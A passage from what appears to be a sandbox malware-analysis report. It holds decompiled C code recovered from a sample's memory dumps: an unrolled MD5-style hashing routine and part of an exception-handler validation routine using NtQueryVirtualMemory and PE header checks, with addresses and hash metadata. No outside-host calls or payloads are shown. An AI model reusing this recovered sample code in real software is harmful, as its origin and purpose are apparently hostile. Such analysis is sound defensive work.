                                                                                                                                                                                                                        				asm("ror esi, 0xa");
                                                                                                                                                                                                                        				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                                                                                                        				_v8 = _t699;
                                                                                                                                                                                                                        				asm("rol eax, 0x7");
                                                                                                                                                                                                                        				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                                                        				asm("rol ecx, 0xc");
                                                                                                                                                                                                                        				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                                                                                                        				_t508 =  !_t357;
                                                                                                                                                                                                                        				asm("ror edx, 0xf");
                                                                                                                                                                                                                        				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                                                                                                        				_v12 = _t410;
                                                                                                                                                                                                                        				_v12 =  !_v12;
                                                                                                                                                                                                                        				asm("ror esi, 0xa");
                                                                                                                                                                                                                        				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                                                                                                        				asm("rol eax, 0x5");
                                                                                                                                                                                                                        				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                                                                                                        				asm("rol ecx, 0x9");
                                                                                                                                                                                                                        				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                                                        				asm("rol edx, 0xe");
                                                                                                                                                                                                                        				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                                                                                                        				asm("ror esi, 0xc");
                                                                                                                                                                                                                        				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                                                                                                        				asm("rol eax, 0x5");
                                                                                                                                                                                                                        				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                                                                                                        				asm("rol ecx, 0x9");
                                                                                                                                                                                                                        				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                                                                                                        				asm("rol edx, 0xe");
                                                                                                                                                                                                                        				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                                                                                                        				asm("ror esi, 0xc");
                                                                                                                                                                                                                        				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                                                                                                        				asm("rol eax, 0x5");
                                                                                                                                                                                                                        				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                                                                                                        				asm("rol ecx, 0x9");
                                                                                                                                                                                                                        				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                                                                                                        				asm("rol edx, 0xe");
                                                                                                                                                                                                                        				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                                                                                                        				asm("ror esi, 0xc");
                                                                                                                                                                                                                        				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                                                                                                        				asm("rol eax, 0x5");
                                                                                                                                                                                                                        				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                                                                                                        				asm("rol ecx, 0x9");
                                                                                                                                                                                                                        				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                                                                                                        				asm("rol edx, 0xe");
                                                                                                                                                                                                                        				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                                                                                                        				asm("ror esi, 0xc");
                                                                                                                                                                                                                        				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                                                                                                        				asm("rol eax, 0x4");
                                                                                                                                                                                                                        				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                                                                                                        				asm("rol ecx, 0xb");
                                                                                                                                                                                                                        				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                                                                                                        				asm("rol edx, 0x10");
                                                                                                                                                                                                                        				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                                                                                                        				_t599 = _t367 ^ _t420;
                                                                                                                                                                                                                        				asm("ror esi, 0x9");
                                                                                                                                                                                                                        				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                                                                                                        				asm("rol eax, 0x4");
                                                                                                                                                                                                                        				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                                                                                                        				asm("rol edi, 0xb");
                                                                                                                                                                                                                        				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                                        				asm("rol edx, 0x10");
                                                                                                                                                                                                                        				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                                                                                                        				_t338 = _t607 ^ _t422;
                                                                                                                                                                                                                        				asm("ror ecx, 0x9");
                                                                                                                                                                                                                        				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                                                                                                        				asm("rol eax, 0x4");
                                                                                                                                                                                                                        				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                                                                                                        				asm("rol esi, 0xb");
                                                                                                                                                                                                                        				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                                                                                                        				asm("rol edi, 0x10");
                                                                                                                                                                                                                        				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                                                                                                        				_t424 = _t734 ^ _t613;
                                                                                                                                                                                                                        				asm("ror ecx, 0x9");
                                                                                                                                                                                                                        				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                                                                                                        				asm("rol eax, 0x4");
                                                                                                                                                                                                                        				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                                                                                                        				asm("rol edx, 0xb");
                                                                                                                                                                                                                        				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                                                                                                        				asm("rol esi, 0x10");
                                                                                                                                                                                                                        				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                                                                                                        				asm("ror ecx, 0x9");
                                                                                                                                                                                                                        				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                                                                                                        				asm("rol eax, 0x6");
                                                                                                                                                                                                                        				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                                                                                                        				asm("rol edx, 0xa");
                                                                                                                                                                                                                        				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                                                                                                        				asm("rol esi, 0xf");
                                                                                                                                                                                                                        				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                                                                                                        				asm("ror ecx, 0xb");
                                                                                                                                                                                                                        				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                                                                                                        				asm("rol eax, 0x6");
                                                                                                                                                                                                                        				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                                                                                                        				asm("rol edx, 0xa");
                                                                                                                                                                                                                        				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                                                                                                        				asm("rol esi, 0xf");
                                                                                                                                                                                                                        				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                                                                                                        				asm("ror ecx, 0xb");
                                                                                                                                                                                                                        				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                                                                                                        				asm("rol eax, 0x6");
                                                                                                                                                                                                                        				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                                                                                                        				asm("rol edx, 0xa");
                                                                                                                                                                                                                        				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                                                                                                        				asm("rol esi, 0xf");
                                                                                                                                                                                                                        				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                                                                                                        				asm("ror edi, 0xb");
                                                                                                                                                                                                                        				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                                                                                                        				asm("rol eax, 0x6");
                                                                                                                                                                                                                        				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                                                                                                        				asm("rol edx, 0xa");
                                                                                                                                                                                                                        				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                                                                                                        				_t400 = _a4;
                                                                                                                                                                                                                        				asm("rol esi, 0xf");
                                                                                                                                                                                                                        				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                                                                                                        				 *_t400 =  *_t400 + _t259;
                                                                                                                                                                                                                        				asm("ror eax, 0xb");
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                                                                                                        				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                                        			}


































































































                                                                                                                                                                                                                        0x026f15d0
                                                                                                                                                                                                                        0x026f15db
                                                                                                                                                                                                                        0x026f15de
                                                                                                                                                                                                                        0x026f15e1
                                                                                                                                                                                                                        0x026f15e2
                                                                                                                                                                                                                        0x026f1600
                                                                                                                                                                                                                        0x026f1602
                                                                                                                                                                                                                        0x026f1605
                                                                                                                                                                                                                        0x026f1608
                                                                                                                                                                                                                        0x026f1608
                                                                                                                                                                                                                        0x026f160b
                                                                                                                                                                                                                        0x026f160b
                                                                                                                                                                                                                        0x026f160e
                                                                                                                                                                                                                        0x026f160e
                                                                                                                                                                                                                        0x026f1611
                                                                                                                                                                                                                        0x026f1611
                                                                                                                                                                                                                        0x026f162e
                                                                                                                                                                                                                        0x026f1631
                                                                                                                                                                                                                        0x026f1647
                                                                                                                                                                                                                        0x026f164a
                                                                                                                                                                                                                        0x026f1664
                                                                                                                                                                                                                        0x026f1667
                                                                                                                                                                                                                        0x026f167d
                                                                                                                                                                                                                        0x026f1680
                                                                                                                                                                                                                        0x026f1682
                                                                                                                                                                                                                        0x026f169a
                                                                                                                                                                                                                        0x026f169d
                                                                                                                                                                                                                        0x026f16a0
                                                                                                                                                                                                                        0x026f16b8
                                                                                                                                                                                                                        0x026f16bb
                                                                                                                                                                                                                        0x026f16d5
                                                                                                                                                                                                                        0x026f16d8
                                                                                                                                                                                                                        0x026f16ee
                                                                                                                                                                                                                        0x026f16f1
                                                                                                                                                                                                                        0x026f16f3
                                                                                                                                                                                                                        0x026f170b
                                                                                                                                                                                                                        0x026f1710
                                                                                                                                                                                                                        0x026f1713
                                                                                                                                                                                                                        0x026f1729
                                                                                                                                                                                                                        0x026f172c
                                                                                                                                                                                                                        0x026f1746
                                                                                                                                                                                                                        0x026f1749
                                                                                                                                                                                                                        0x026f175f
                                                                                                                                                                                                                        0x026f1762
                                                                                                                                                                                                                        0x026f1764
                                                                                                                                                                                                                        0x026f177f
                                                                                                                                                                                                                        0x026f1782
                                                                                                                                                                                                                        0x026f1799
                                                                                                                                                                                                                        0x026f179c
                                                                                                                                                                                                                        0x026f17a0
                                                                                                                                                                                                                        0x026f17b9
                                                                                                                                                                                                                        0x026f17bc
                                                                                                                                                                                                                        0x026f17be
                                                                                                                                                                                                                        0x026f17c1
                                                                                                                                                                                                                        0x026f17dc
                                                                                                                                                                                                                        0x026f17df
                                                                                                                                                                                                                        0x026f17f8
                                                                                                                                                                                                                        0x026f17fb
                                                                                                                                                                                                                        0x026f180b
                                                                                                                                                                                                                        0x026f180e
                                                                                                                                                                                                                        0x026f1826
                                                                                                                                                                                                                        0x026f1829
                                                                                                                                                                                                                        0x026f1843
                                                                                                                                                                                                                        0x026f1846
                                                                                                                                                                                                                        0x026f185e
                                                                                                                                                                                                                        0x026f1861
                                                                                                                                                                                                                        0x026f1877
                                                                                                                                                                                                                        0x026f187a
                                                                                                                                                                                                                        0x026f1892
                                                                                                                                                                                                                        0x026f1895
                                                                                                                                                                                                                        0x026f18ad
                                                                                                                                                                                                                        0x026f18b0
                                                                                                                                                                                                                        0x026f18ca
                                                                                                                                                                                                                        0x026f18cd
                                                                                                                                                                                                                        0x026f18e3
                                                                                                                                                                                                                        0x026f18e6
                                                                                                                                                                                                                        0x026f18fe
                                                                                                                                                                                                                        0x026f1901
                                                                                                                                                                                                                        0x026f191b
                                                                                                                                                                                                                        0x026f191e
                                                                                                                                                                                                                        0x026f1936
                                                                                                                                                                                                                        0x026f1939
                                                                                                                                                                                                                        0x026f194f
                                                                                                                                                                                                                        0x026f1952
                                                                                                                                                                                                                        0x026f196a
                                                                                                                                                                                                                        0x026f196d
                                                                                                                                                                                                                        0x026f1985
                                                                                                                                                                                                                        0x026f1988
                                                                                                                                                                                                                        0x026f199a
                                                                                                                                                                                                                        0x026f199d
                                                                                                                                                                                                                        0x026f19af
                                                                                                                                                                                                                        0x026f19b2
                                                                                                                                                                                                                        0x026f19c4
                                                                                                                                                                                                                        0x026f19c7
                                                                                                                                                                                                                        0x026f19cb
                                                                                                                                                                                                                        0x026f19db
                                                                                                                                                                                                                        0x026f19de
                                                                                                                                                                                                                        0x026f19ec
                                                                                                                                                                                                                        0x026f19ef
                                                                                                                                                                                                                        0x026f1a01
                                                                                                                                                                                                                        0x026f1a04
                                                                                                                                                                                                                        0x026f1a18
                                                                                                                                                                                                                        0x026f1a1b
                                                                                                                                                                                                                        0x026f1a1d
                                                                                                                                                                                                                        0x026f1a2d
                                                                                                                                                                                                                        0x026f1a30
                                                                                                                                                                                                                        0x026f1a42
                                                                                                                                                                                                                        0x026f1a45
                                                                                                                                                                                                                        0x026f1a53
                                                                                                                                                                                                                        0x026f1a56
                                                                                                                                                                                                                        0x026f1a68
                                                                                                                                                                                                                        0x026f1a6b
                                                                                                                                                                                                                        0x026f1a6f
                                                                                                                                                                                                                        0x026f1a7f
                                                                                                                                                                                                                        0x026f1a82
                                                                                                                                                                                                                        0x026f1a94
                                                                                                                                                                                                                        0x026f1a97
                                                                                                                                                                                                                        0x026f1aa5
                                                                                                                                                                                                                        0x026f1aa8
                                                                                                                                                                                                                        0x026f1aba
                                                                                                                                                                                                                        0x026f1abd
                                                                                                                                                                                                                        0x026f1acf
                                                                                                                                                                                                                        0x026f1ad2
                                                                                                                                                                                                                        0x026f1ae6
                                                                                                                                                                                                                        0x026f1ae9
                                                                                                                                                                                                                        0x026f1afd
                                                                                                                                                                                                                        0x026f1b00
                                                                                                                                                                                                                        0x026f1b14
                                                                                                                                                                                                                        0x026f1b17
                                                                                                                                                                                                                        0x026f1b2b
                                                                                                                                                                                                                        0x026f1b2e
                                                                                                                                                                                                                        0x026f1b42
                                                                                                                                                                                                                        0x026f1b45
                                                                                                                                                                                                                        0x026f1b59
                                                                                                                                                                                                                        0x026f1b5e
                                                                                                                                                                                                                        0x026f1b70
                                                                                                                                                                                                                        0x026f1b73
                                                                                                                                                                                                                        0x026f1b87
                                                                                                                                                                                                                        0x026f1b8a
                                                                                                                                                                                                                        0x026f1b9e
                                                                                                                                                                                                                        0x026f1ba1
                                                                                                                                                                                                                        0x026f1bb7
                                                                                                                                                                                                                        0x026f1bba
                                                                                                                                                                                                                        0x026f1bce
                                                                                                                                                                                                                        0x026f1bd1
                                                                                                                                                                                                                        0x026f1be3
                                                                                                                                                                                                                        0x026f1be6
                                                                                                                                                                                                                        0x026f1bfa
                                                                                                                                                                                                                        0x026f1bfd
                                                                                                                                                                                                                        0x026f1c11
                                                                                                                                                                                                                        0x026f1c14
                                                                                                                                                                                                                        0x026f1c28
                                                                                                                                                                                                                        0x026f1c31
                                                                                                                                                                                                                        0x026f1c34
                                                                                                                                                                                                                        0x026f1c3d
                                                                                                                                                                                                                        0x026f1c46
                                                                                                                                                                                                                        0x026f1c4e
                                                                                                                                                                                                                        0x026f1c56
                                                                                                                                                                                                                        0x026f1c60
                                                                                                                                                                                                                        0x026f1c75

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                        • Opcode ID: 15e1380e15b0ebf54054c847e8a18368959b7e1851db026a7a40a2c4e248b9ad
                                                                                                                                                                                                                        • Instruction ID: a85202c5b3ad9d8bc3302ee19f1b12a67e9980474913d3978b51871323d7c3bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15e1380e15b0ebf54054c847e8a18368959b7e1851db026a7a40a2c4e248b9ad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6222857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E021923F5(long _a4) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                        				short* _v32;
                                                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                                        				signed int* _t68;
                                                                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                        				void _t80;
                                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                        				short* _t87;
                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                        				signed int* _t90;
                                                                                                                                                                                                                        				long _t91;
                                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                        				long _t108;
                                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t108 = _a4;
                                                                                                                                                                                                                        				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                        				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                        				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                        					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                        					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                        					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                        						_t91 = 0;
                                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                        							_t80 =  *_t57;
                                                                                                                                                                                                                        							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                        							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags = _t80 - _t91;
                                                                                                                                                                                                                        							if(_t80 >= _t91) {
                                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                                        								_t63 = 0;
                                                                                                                                                                                                                        								L60:
                                                                                                                                                                                                                        								return _t63;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                                        							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                        							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                        								_t12 =  &_a4;
                                                                                                                                                                                                                        								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                        								__eflags =  *_t12;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                                                                        							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                        							__eflags = _t91 - _t102;
                                                                                                                                                                                                                        						} while (_t91 <= _t102);
                                                                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                        							_t81 =  *0x2194178;
                                                                                                                                                                                                                        							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                        							_t58 = 0;
                                                                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                                                                        							if(_t81 <= 0) {
                                                                                                                                                                                                                        								L18:
                                                                                                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                        								__eflags = _t61;
                                                                                                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									_t62 = _a4;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								__eflags = _t62;
                                                                                                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                                                                                                        									L59:
                                                                                                                                                                                                                        									_t63 = _t104;
                                                                                                                                                                                                                        									goto L60;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                        										L46:
                                                                                                                                                                                                                        										_t63 = 1;
                                                                                                                                                                                                                        										 *0x21941c0 = 1;
                                                                                                                                                                                                                        										__eflags =  *0x21941c0;
                                                                                                                                                                                                                        										if( *0x21941c0 != 0) {
                                                                                                                                                                                                                        											goto L60;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										_t84 =  *0x2194178;
                                                                                                                                                                                                                        										__eflags = _t84;
                                                                                                                                                                                                                        										_t93 = _t84;
                                                                                                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                                                                                                        											L51:
                                                                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                                        												 *0x21941c0 = 0;
                                                                                                                                                                                                                        												goto L5;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											_t77 = 0xf;
                                                                                                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                                                                                                        												_t77 = _t84;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											_t94 = 0;
                                                                                                                                                                                                                        											__eflags = _t77;
                                                                                                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                                                                                                        												L56:
                                                                                                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                                                                                                        													__eflags = _t86;
                                                                                                                                                                                                                        													 *0x2194178 = _t86;
                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                        												do {
                                                                                                                                                                                                                        													_t68 = 0x2194180 + _t94 * 4;
                                                                                                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                                                                                                        													_t110 =  *_t68;
                                                                                                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                                                                                                        												goto L56;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										_t69 = 0x219417c + _t84 * 4;
                                                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                                                                                                        												goto L51;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											goto L51;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										goto L51;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t87 = _v32;
                                                                                                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                                                                                                        										goto L46;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                        										goto L46;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                                        							}
